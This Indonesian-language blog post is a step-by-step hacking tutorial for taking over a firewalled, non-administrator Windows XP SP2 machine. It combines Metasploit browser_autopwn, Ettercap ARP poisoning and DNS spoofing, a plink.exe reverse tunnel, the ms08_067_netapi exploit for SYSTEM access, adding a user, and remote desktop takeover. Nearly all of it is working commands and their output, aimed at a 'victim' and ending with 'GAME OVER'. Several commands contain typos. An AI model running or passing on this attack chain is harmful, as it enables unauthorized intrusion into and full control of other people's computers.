Hehe..
Jangan bosen-bosennya membaca post dari saya ya? Kali ini saya mau
sharing metasploit.. Memang mudah mengeksploit Windows XP Service Pack 2
tanpa firewall.. Tapi kalo dipasang firewall?? Lalu gimana jika korban
ternyata bukan seorang administrator, dimana privilege nya sangat
terbatas?? Saya akan beritau caranya, tutorial ini akan panjang, jadi
sarankan jika ingin membaca tutorial ini, siapkan secangkir kopi dan
sebatang rokok..
Briefing:
Pastikan anda memiliki program ini:
1. nmap
2. metasploit
3. ettercap
Tutorial:
Hal
penting yang harus diketahui adalah menyadari bahwa korban menggunakan
firewall, sehingga membatasi perintah ping dari luar, bagaimana cara
mengetahuinya?
Buka terminal, lalu ketik
Code:
nmap [IP address korban]
Contoh, korban memiliki IP address 192.168.1.10, maka perintahnya adalah:
Code:
nmap 192.168.1.10
Jika korban memang menggunakan firewall, maka outputnya akan tampak seperti ini
Code:
All 1000 scanned ports on 192.168.1.10 are filtered
Dalam kasus seperti ini, anda tidak dapat menggunakan exploit standar
Code:
exploit/windows/smb/ms08_067_netapi
Karena hasilnya akan nihil, karena koneksi ditolak oleh firewall. Lalu, bagaimana cara melewati firewall ini??
Buka metasploit kamu:
root@red-dragon:/# cd /pentest/exploits/framework2/
root@red-dragon:/pentest/exploits/framework2# ./msfconsole
Kemudian gunakan auxiliary browser_autopwn
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
Kemudian atur auxiliary kamu.
msf auxiliary(browser_autopwn) > set LHOST [ip address kamu]
msf auxiliary(browser_autopwn) > set SRVHOST [ip address kamu]
msf auxiliary(browser_autopwn) > set SRVPORT 80
msf auxiliary(browser_autopwn) > set URIPATH /
Terakhir, jalankan auxiliary kamu.
msf auxiliary(browser_autopwn) > exploit -j
Tunggu sampai semua exploit dan payload berhasil di siapkan, kemudian kita akan bermain ke jaringan.
Menunggu
memang membosankan, jadi lebih baik kita routing koneksi korban ke IP
address kita. Perlu diketahui, auxiliary/server/browser_autopwn akan
bereaksi jika korban mengakses IP address kita melalui browser internet.
Ini akan memperkecil peluang eksploitasi, untuk itu daripada menunggu
tanpa kepastian, lebih baik membuat kepastian. Gunakan dns_spoofing
ettercap. :)
Sebelum memulai spoofing dns, kita harus mengatur ulang konfigurasi dns. Caranya, buka terminal, lalu ketik:
Code:
root@red-dragon:/# gedit /usr/share/ettercap/etter.dns
Hapus semua, dan masukan
Code:
* A [IP address kamu]
Jika IP address kamu 192.168.1.2, maka
Code:
* A 192.168.1.2
Simpan konfigurasi, kemudian eksekusi spoofing dns menggunakan ettercap.
Code:
root@red-dragon:/# ettercap -i [interface] [option] /target 1/ /target 2/
Dalam kasus ini, saya berada di wifi area, IP address korban 192.168.1.10, dan IP address access poin 192.168.1.1
Maka.
- Interface = wlan0
- target 1 = 192.168.1.1
- target 2 = 192.168.1.10
Masukan perintah ini ke dalam terminal:
Code:
root@red-dragon:/# ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /192.168.1.1/ /192.168.1.10/
Dengan
ini, alamat apapun yang korban masukan di address bar akan menjadi
----> 192.168.1.2 alias IP address kita. Dengan ini, metasploit akan
bereaksi terhadap klien yang mengakses IP address kita melalui browser
internetnya.
Perhatikan output metasploit:
[*] request '/' from 192.168.1.10:1809
[*] request '/?essid=xxxxxxxxxxxxxx' from 192.168.1.10:1809
[*] responding with exploits
[*] ending internet explorer COM CreateObject Code Execution exploit HTML to 192.168.1.10:1809
[*] sending EXE payload to 192.168.1.10:1809
[*] sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.1.2:3333 -> 192.168.1.10:1809)
Memasuki
tahap meterpreter dalam komputer yang tidak memiliki akses khusus
layaknya administrator tidaklah terlalu menyenangkan. Selain hak yang
dibatasi, tidak akan ada banyak perintah yang berfungsi dalam command
prompt. Untuk mengangkat privilege, kita harus masuk ke sesi meterpreter
terlebih dahulu. Masukan perintah ini di dalam metasploit:
Code:
msf auxiliary(browser_autopwn) > session -i l
Ini berfungsi untuk berinteraksi dengan meterpreter sesi pertama.
meterpreter > getuid
Outpunya:
user
Ini menunjukan bahwa pengguna bernama user.
meterpreter > shell
C:\Documents and Settings\user\Desktop> net user stdio stdio /add
Perintah
ini akan gagal diekseksi, karena pengguna tidak menjalankan komputer
atau leptopnya atas nama administrator. Jika bagini, kita membutuhkan
software jahat yang disediakan backtrack untuk mengubah user menjadi
administrator.
C:\Documents and Settings\user\Desktop> netstat -an
Perhatikan
port 445 yang terbuka dalam network status. Kemudian kita kembali lagi
pada sesi meterpreter, untuk mengupload program jahat.
C:\Documents and Settings\user\Desktop>exit
meterpreter > upload /pentest/windows-binaries/tools/plink.exe "C:\\documents and settings\user\desktop\\"Jika upload berhasil, langkah selanjutnya adalah kembali lagi ke command prompt untuk mengeksekusi program jahat tersebut.
meterpreter > shell
C:\Documents and Settings\user\Desktop>plink.exe -l [username] -pw [password] -R port:localhost:port [ip address kamu]
Contoh
dalam kasus ini, saya ingin username saya root, dan password toor,
dengan port 445 yang terbuka, dan IP local host 127.0.0.1 dan ip address
saya 192.168.1.2 maka:
-l = root
-pw = toor
ip address = 192.168.1.2
Jadi masukan perintah ini:
C:\Documents and Settings\user\Desktop>pling.exe -l root -pw toor -R 445:127.0.0.1:445 192.168.1.2
Buka terminal baru dan ketik:
root@red-dragon:~# netstat -antp |grep 445
Jika 127.0.0.1ada dalam daftar, maka kita siap melakukan exploitasi tahap kedua. Masukan perintah berikut:
./pentest/exploits/framework3/msfconsole
Code:
msf > use exploit/windows/smb/ms08_067_netapi
Code:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Code:
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.2
Code:
msf exploit(ms08_067_netapi) > set RHOST 127.0.01
Code:
msf exploit(ms08_067_netapi) > set RPORT 445
Code:
msf exploit(ms08_067_netapi) > exploit -j
OUTPUT:
[*]Started reverse handler on 192.168.1.2:4444
[*]Automatically detecting the taget..
[*]Fingerprint: Windows XP Service Pack 2 - lang:English
[*]Selected Target: Windows XP SP 2 English (NX)
[*]Triggering the vulnerability...
[*]Sending stage (748032 bytes)
[*]Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.10:1809)
meterpreter >
Pada meterpreter ini, kita akan menguji apakah kita sudah menjadi administrator atau belum:
Masukan kode berikut:
Code:
meterpreter > getuid
Jika kita sudah menjadi administrator, maka outputnya akan tampak seperti ini:
Code:
meterpreter > NT AUTHORITY\SYSTEM
Cukupkah?
Saya rasa belum jika kita belum meremote desktop korban. Perlu diingat
bahwa koneksi VNC (Program untuk remote desktop) berjalan di port 3389.
Kembali kita gunakan tplink.exe
meterpreter > shell
C:\WINDOWS\system32>cd c:\documents and settings\user\desktop
C:\Documents and Settings/user/Desktop> net stdio stdio /add
C:\Documents and Settings/user/Desktop> C:
C:\tplink.exe -l root -pw toor 3389:127.0.0.1:3389 192.168.1.2
Untuk meremote desktop korban, kita hanya perlu mengeksekusi rdesktop. Buka terminal baru, lalu masukan perintah:
Code:
rdesktop 127.0.01
Untuk Username, masukan root.
Dan untuk password, masukan toor.
GAME OVER. Desktop sudah kamu kendalikan. Keyboard, dan mouse ada dalam kuasa kita.
Memberal_Force
Powered by: Metasploit ettercap blue-dragon
Src : http://double-dragon.blogspot.com
-
Blogger Comment
-
Facebook Comment
Subscribe to:
Post Comments
(
Atom
)
0 komentar :
Post a Comment
Silahkan Ber-Komentar bro.. :)
SOPAN WAJIB !!